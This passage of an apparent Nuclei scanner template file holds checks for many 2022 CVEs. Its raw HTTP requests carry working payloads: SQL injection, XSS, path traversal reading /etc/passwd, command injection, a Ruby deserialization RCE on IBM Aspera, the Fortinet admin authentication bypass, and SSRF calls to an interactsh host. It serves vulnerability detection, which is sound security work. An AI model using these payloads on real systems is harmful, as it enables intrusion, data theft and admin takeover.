Injection","severity":"high"},"requests":[{"raw":["POST /admin/asign-single-student-subjects.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsubmit=Press&roll_no=3&course_code=sd' UNION ALL SELECT CONCAT(md5({{num}}),12,21),NULL,NULL,NULL,NULL#\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["{{md5({{num}})}}"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2022-0597","info":{"name":"Microweber < 1.2.11 - Open Redirection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/logout?redirect_to=http://oast.pro/"],"matchers":[{"type":"regex","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.pro.*$"],"part":"header"}]}]},{"id":"CVE-2022-0928","info":{"name":"Microweber < 1.2.12 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /api/user_login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","POST /api/shop/save_tax_item HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: {{BaseURL}}/admin/view:settings\n\nid=0&name=vat1&type=\"><img+src%3dx+onerror%3dalert(document.domain)>&rate=10\n","POST /module HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer:{{BaseURL}}/admin/view:settings\n\nclass=+module+module-shop-taxes-admin-list-taxes+&id=mw_admin_shop_taxes_items_list&parent-module-id=settings-admin-mw-main-module-backend-shop-taxes-admin&parent-module=shop%2Ftaxes%2Fadmin&data-type=shop%2Ftaxes%2Fadmin_list_taxes\n"],"matchers":[{"type":"dsl","dsl":["contains(body_3,\"<img src=x onerror=alert(document.domain)></td>\")","contains(header_3,\"text/html\")","status_code_2 == 200 && status_code_3 == 200"],"condition":"and"}]}]},{"id":"CVE-2022-45354","info":{"name":"Download Monitor <= 4.7.60 - Sensitive Information Exposure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/download-monitor/v1/user_data"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"registered\":","\"display_name\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43015","info":{"name":"OpenCATS 0.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /ajax.php?f=getPipelineJobOrder&joborderID=2&page=0&entriesPerPage=15)\"></a>%20<script>alert(document.domain)</script>&sortBy=dateCreatedInt&sortDirection=desc&indexFile=index.php&isPopup=0 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","MySQL Query Failed"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-41473","info":{"name":"RPCMS 3.0.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/search/?q=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","rpcms"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-42094","info":{"name":"Backdrop CMS version 1.23.0 - Stored Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /?q=user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname={{username}}&pass={{password}}&form_build_id={{form_id_1}}&form_id=user_login&op=Log+in\n","GET /?q=node/add/card HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=node/add/card HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryWEcZgRB4detkrGaY\n\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"title\"\n\n{{randstr}}\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"files[field_image_und_0]\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"field_image[und][0][fid]\"\n\n0\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"field_image[und][0][display]\"\n\n1\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"changed\"\n\n\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"form_build_id\"\n\n{{form_id_2}}\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"form_token\"\n\n{{form_token}}\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"form_id\"\n\ncard_node_form\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"body[und][0][value]\"\n\n<img src=x onerror=alert(document.domain)>\n\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"body[und][0][format]\"\n\nfull_html\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"status\"\n\n1\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"name\"\n\n{{name}}\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"date[date]\"\n\n2023-04-13\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"date[time]\"\n\n21:49:36\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"path[auto]\"\n\n1\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"comment\"\n\n1\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"additional_settings__active_tab\"\n\n\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"op\"\n\nSave\n------WebKitFormBoundaryWEcZgRB4detkrGaY--\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=\"x\" onerror=\"alert(document.domain)\" />","Backdrop CMS"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"form_id_1","group":1,"regex":["name=\"form_build_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"name","group":1,"regex":["name=\"name\" value=\"(.*?)\""],"internal":true},{"type":"regex","name":"form_id_2","group":1,"regex":["name=\"form_build_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"form_token","group":1,"regex":["name=\"form_token\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-47986","info":{"name":"IBM Aspera Faspex <=4.4.2 PL1 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /aspera/faspex/package_relay/relay_package HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"package_file_list\": [\"/\"], \"external_emails\": \"\\n---\\n- !ruby/object:Gem::Installer\\n    i: x\\n- !ruby/object:Gem::SpecFetcher\\n    i: y\\n- !ruby/object:Gem::Requirement\\n  requirements:\\n    !ruby/object:Gem::Package::TarReader\\n    io: &1 !ruby/object:Net::BufferedIO\\n      io: &1 !ruby/object:Gem::Package::TarReader::Entry\\n         read: 0\\n         header: \\\"pew\\\"\\n      debug_output: &1 !ruby/object:Net::WriteAdapter\\n         socket: &1 !ruby/object:PrettyPrint\\n             output: !ruby/object:Net::WriteAdapter\\n                 socket: &1 !ruby/module \\\"Kernel\\\"\\n                 method_id: :eval\\n             newline: \\\"throw `id`\\\"\\n             buffer: {}\\n             group_stack:\\n              - !ruby/object:PrettyPrint::Group\\n                break: true\\n         method_id: :breakable\\n\", \"package_name\": \"{{rand_base(4)}}\", \"package_note\": \"{{randstr}}\", \"original_sender_name\": \"{{randstr}}\", \"package_uuid\": \"d7cb6601-6db9-43aa-8e6b-dfb4768647ec\", \"metadata_human_readable\": \"Yes\", \"forward\": \"pew\", \"metadata_json\": \"{}\", \"delivery_uuid\": \"d7cb6601-6db9-43aa-8e6b-dfb4768647ec\", \"delivery_sender_name\": \"{{rand_base(8)}}\", \"delivery_title\": \"{{rand_base(4)}}\", \"delivery_note\": \"{{rand_base(4)}}\", \"delete_after_download\": true, \"delete_after_download_condition\": \"IDK\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","regex":["uid=\\d+\\(([^)]+)\\) gid=\\d+\\(([^)]+)\\)"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-1937","info":{"name":"WordPress Awin Data Feed <=1.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin-ajax.php?action=get_sw_product&title=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(header_2, \"text/html\")","status_code_2 == 200","contains(body_2, 'colspan=\\\"2\\\"><script>alert(document.domain)</script></th>')"],"condition":"and"}]}]},{"id":"CVE-2022-43018","info":{"name":"OpenCATS 0.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /index.php?m=toolbar&callback=abcd&a=checkEmailIsInSystem&email=</script><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>:0"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-40047","info":{"name":"Flatpress < v1.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary{{randstring}}\n\n------WebKitFormBoundary{{randstring}}\nContent-Disposition: form-data; name=\"user\"\n\n{{username}}\n------WebKitFormBoundary{{randstring}}\nContent-Disposition: form-data; name=\"pass\"\n\n{{password}}\n------WebKitFormBoundary{{randstring}}\nContent-Disposition: form-data; name=\"submit\"\n\nLogin\n------WebKitFormBoundary{{randstring}}--\n","GET /admin.php?p=static&action=write&page=%22onfocus%3d%22alert%28document.domain%29%22autofocus%3d%22zr4da HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"flatpress\")","contains(content_type_2, \"text/html\")","contains(body_2, \"onfocus=\\\"alert(document.domain)\")"],"condition":"and"}]}]},{"id":"CVE-2022-0885","info":{"name":"Member Hero <=1.0.9 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=memberhero_send_form&_memberhero_hook=phpinfo"],"matchers-condition":"and","matchers":[{"type":"word","words":["PHP Extension","PHP Version","<!DOCTYPE html"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"],"part":"body"}]}]},{"id":"CVE-2022-40684","info":{"name":"Fortinet - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /api/v2/cmdb/system/admin HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Node.js\nForwarded: by=\"[127.0.0.1]:1337\";for=\"[127.0.0.1]:1337\";proto=http;host=\nX-Forwarded-Vdom: root\n","PUT /api/v2/cmdb/system/admin/admin HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Report Runner\nContent-Type: application/json\nForwarded: for=[127.0.0.1]:8000;by=[127.0.0.1]:9000;\nContent-Length: 610\n\n {\n  \"ssh-public-key1\":\"{{randstr}}\"\n}\n"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body_1","words":["ENC XXXX","http_method"],"condition":"and"},{"type":"word","part":"body_2","words":["Invalid SSH public key.","cli_error"],"condition":"and"}]}]},{"id":"CVE-2022-0234","info":{"name":"WordPress WOOCS < 1.3.7.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-admin/admin-ajax.php?action=woocs_get_products_price_html&woocs_in_order_currency=<img%20src%20onerror=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(document.domain)>","\"current_currency\":"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-30513","info":{"name":"School Dormitory Management System 1.0 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /dms/admin/login.php?f=login HTTP/1.1\nHost: {{Hostname}}\n\nusername={{username}}&password={{password}}\n","GET /dms/admin/?page=%27%3B%20alert(document.domain)%3B%20s%3D%27 HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["''; alert(document.domain); s='';","School Dormitory Management System"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3908","info":{"name":"WordPress Helloprint <1.4.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=language-translate.php&success=added\"><script>alert(`XSS`)<%2Fscript> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"Translation added\\\\\\\"><script>alert(`XSS`)</script> successfully\")"],"condition":"and"}]}]},{"id":"CVE-2022-33965","info":{"name":"WordPress Visitor Statistics <=5.7 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /?wmcAction=wmcTrack&url=test&uid=0&pid=0&visitorId=1331'+and+sleep(7)+or+' HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=7"]},{"type":"regex","regex":["^1331' and sleep\\(7\\) or '$"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31269","info":{"name":"Linear eMerge E3-Series - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/test.txt"],"matchers-condition":"and","matchers":[{"type":"word","words":["ID=","Password="],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["Password='(.+?)'"]}]}]},{"id":"CVE-2022-29303","info":{"name":"SolarView Compact 6.00 - OS Command Injection","severity":"critical"},"requests":[{"raw":["@timeout: 25s\nPOST /conf_mail.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nmail_address=%3B{{cmd}}%3B&button=%83%81%81%5B%83%8B%91%97%90M\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0"]},{"type":"word","part":"body","words":["p1_network_mail.cgi"]}]}]},{"id":"CVE-2022-24264","info":{"name":"Cuppa CMS v1.0 - SQL injection","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","POST /components/table_manager/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nsearch_word=')+union+all+select+1,md5('{{num}}'),3,4,5,6,7,8--+-&order_by=id&order_orientation=ASC&path=component%2Ftable_manager%2Fview%2Fcu_countries&uniqueClass=wrapper_content_518284\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{md5(num)}}","td_available_languages"],"condition":"and"},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0786","info":{"name":"WordPress KiviCare <2.3.9 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=ajax_get&route_name=get_doctor_details&clinic_id=%7B\"id\":\"1\"%7D&props_doctor_id=1,2)+AND+(SELECT+42+FROM+(SELECT(SLEEP(6)))b HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Doctor details\")"],"condition":"and"}]}]},{"id":"CVE-2022-31984","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/requests/take_action.php?id=6'+UNION+ALL+SELECT+md5('{{num}}'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0591","info":{"name":"Formcraft3 <3.8.28 - Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/formcraft3/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=formcraft3_get&URL=https://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: WordPress"]}]}]},{"id":"CVE-2022-32772","info":{"name":"WWBN AVideo 11.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["avideoAlertInfo(\"</script><script>alert(document.cookie);</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3242","info":{"name":"Microweber <1.3.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/search.php?keywords=ABC%3Cdiv%20style=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"<script>alert(document.domain)</script>\") && contains(tolower(body), \"microweber\")"],"condition":"and"}]}]},{"id":"CVE-2022-40843","info":{"name":"Tenda AC1200 V-W15Ev2 - Authentication Bypass","severity":"medium"},"requests":[{"raw":["GET /goform/downloadSyslog/syslog.log HTTP/1.1\nHost: {{Hostname}}\nCookie: W15Ev2_user=\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["^0\\d{3}$"]},{"type":"word","part":"body","words":["[system]","[error]","[wan1]"],"condition":"or"},{"type":"word","part":"header","words":["Content-type: config/conf"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29548","info":{"name":"WSO2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/carbon/admin/login.jsp?loginStatus=false&errorCode=%27);alert(document.domain)//"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["CARBON.showWarningDialog('???');alert(document.domain)//???"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4049","info":{"name":"WP User <= 7.0 - Unauthenticated SQLi","severity":"critical"},"requests":[{"raw":["GET {{path}} HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=wpuser_group_action&group_action=x&wpuser_update_setting={{nonce}}&id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))khkM)\n"],"attack":"clusterbomb","payloads":{"path":["/index.php/user/","/user"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header_2, \"text/html\")","contains(body_2, 'Invalid Access')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["\"wpuser_update_setting\":\"([0-9a-zA-Z]+)\""],"internal":true}]}]},{"id":"CVE-2022-44948","info":{"name":"Rukovoditel <= 3.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/entities_groups&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-22965","info":{"name":"Spring - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST {{BaseURL}} HTTP/1.1\nContent-Type: application/x-www-form-urlencoded\n\nclass.module.classLoader.resources.context.configFile={{interact_protocol}}://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx\n","GET /?class.module.classLoader.resources.context.configFile={{interact_protocol}}://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1\n"],"payloads":{"interact_protocol":["http","https"]},"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: Java"],"case-insensitive":true}]}]},{"id":"CVE-2022-29455","info":{"name":"WordPress Elementor Website Builder <= 3.5.5 - DOM Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/elementor/readme.txt"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '<= 3.5.5')"]},{"type":"word","part":"body","words":["Elementor Website Builder"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["(?m)Stable tag: ([0-9.]+)"],"internal":true},{"type":"regex","group":1,"regex":["(?m)Stable tag: ([0-9.]+)"]}]}]},{"id":"CVE-2022-30512","info":{"name":"School Dormitory Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/dms/admin/accounts/payment_history.php?account_id=2%27"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Fatal error","Uncaught Error: Call to a member function fetch_assoc()","<th class=\"\">Month of</th>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1724","info":{"name":"WordPress Simple Membership <4.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/simple-membership/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Simple Membership","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=swpm_validate_email&fieldId=%22%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"<script>alert(document.domain)</script>\","]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34121","info":{"name":"CuppaCMS v1.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /templates/default/html/windows/right.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=../../../../../../../../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2383","info":{"name":"WordPress Feed Them Social <3.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/feed-them-social/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Feed Them Social","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=fts_refresh_token_ajax&feed=instagram&expires_in=%3Cimg%20src%20onerror%3Dalert%28document.domain%29%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(document.domain)><br/>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1933","info":{"name":"WordPress CDI <5.1.9 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=cdi_collect_follow&trk=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Tracking code not correct"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43017","info":{"name":"OpenCATS 0.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /ajax.php?f=getPipelineJobOrder&joborderID=1&page=0&entriesPerPage=1&sortBy=dateCreatedInt&sortDirection=desc&indexFile=15)\"></a><script>alert(document.domain)</script>&isPopup=0 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","CATS="],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0949","info":{"name":"WordPress Stop Bad Bots <6.930 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nX-Real-IP: {{IP}}\nContent-Type: application/x-www-form-urlencoded\n\naction=stopbadbots_grava_fingerprint&fingerprint=0\n","@timeout 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nX-Real-IP: {{IP}}\nContent-Type: application/x-www-form-urlencoded\n\naction=stopbadbots_grava_fingerprint&fingerprint=(SELECT SLEEP(6))\n","GET /wp-content/plugins/stopbadbots/assets/js/stopbadbots.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=6","status_code_2 == 200","contains(body_3, \"commentform\")"],"condition":"and"}]}]},{"id":"CVE-2022-0867","info":{"name":"WordPress ARPrice <3.6.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=arplite_insert_plan_id&arp_plan_id=x&arp_template_id=1+AND+(SELECT+8948+FROM+(SELECT(SLEEP(6)))iIic)\n","GET /wp-content/plugins/arprice-responsive-pricing-table/js/arprice.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code_1 == 200","contains(content_type_1, \"text/html\")","contains(body_2, \"ArpPriceTable\")"],"condition":"and"}]}]},{"id":"CVE-2022-0147","info":{"name":"WordPress Cookie Information/Free GDPR Consent Solution <2.0.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=wp-gdpr-compliance&x=%27+onanimationstart%3Dalert%28document.domain%29+style%3Danimation-name%3Arotation+x  HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["x=\\' onanimationstart=alert(document.domain) style=animation-name:rotation x'","toplevel_page_wp-gdpr-compliance"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-44291","info":{"name":"WebTareas 2.4p5 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /general/login.php?session=false HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------3023071625140724693672385525\n\n-----------------------------3023071625140724693672385525\nContent-Disposition: form-data; name=\"action\"\n\nlogin\n-----------------------------3023071625140724693672385525\nContent-Disposition: form-data; name=\"loginForm\"\n\n{{username}}\n-----------------------------3023071625140724693672385525\nContent-Disposition: form-data; name=\"passwordForm\"\n\n{{password}}\n-----------------------------3023071625140724693672385525\nContent-Disposition: form-data; name=\"loginSubmit\"\n\nLog In\n-----------------------------3023071625140724693672385525--\n","@timeout: 20s\nGET 